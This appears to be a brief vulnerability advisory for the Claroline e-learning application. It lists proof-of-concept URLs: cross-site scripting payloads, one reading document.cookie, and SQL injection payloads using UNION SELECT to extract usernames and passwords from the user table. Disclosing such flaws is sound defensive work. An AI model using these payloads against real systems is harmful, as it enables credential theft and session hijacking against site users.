|
|
Claroline E-Learning Application Multiple Remote Input Validation Vulnerabilities
No exploit is required to leverage any of these issues. The following proof of concepts have been provided: Cross-site scripting proof of concepts: http:///www.example.com/claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E http:///www.example.com/claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E http:///www.example.com/claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E SQL Injection proof of concepts: http:///www.example.com/claroline/user/userInfo.php?uInfo=-1%20UNION%20SELECT%20username,password,0,0,0,0,0%20from%20user%20where%20user_id=1/* http:///www.example.com/claroline/tracking/exercises_details.php?exo_id=-1/**/UNION/**/SELECT%200,password,username,0,0,0%20from%20user%20where%20user_id=1-- |
|
Privacy Statement |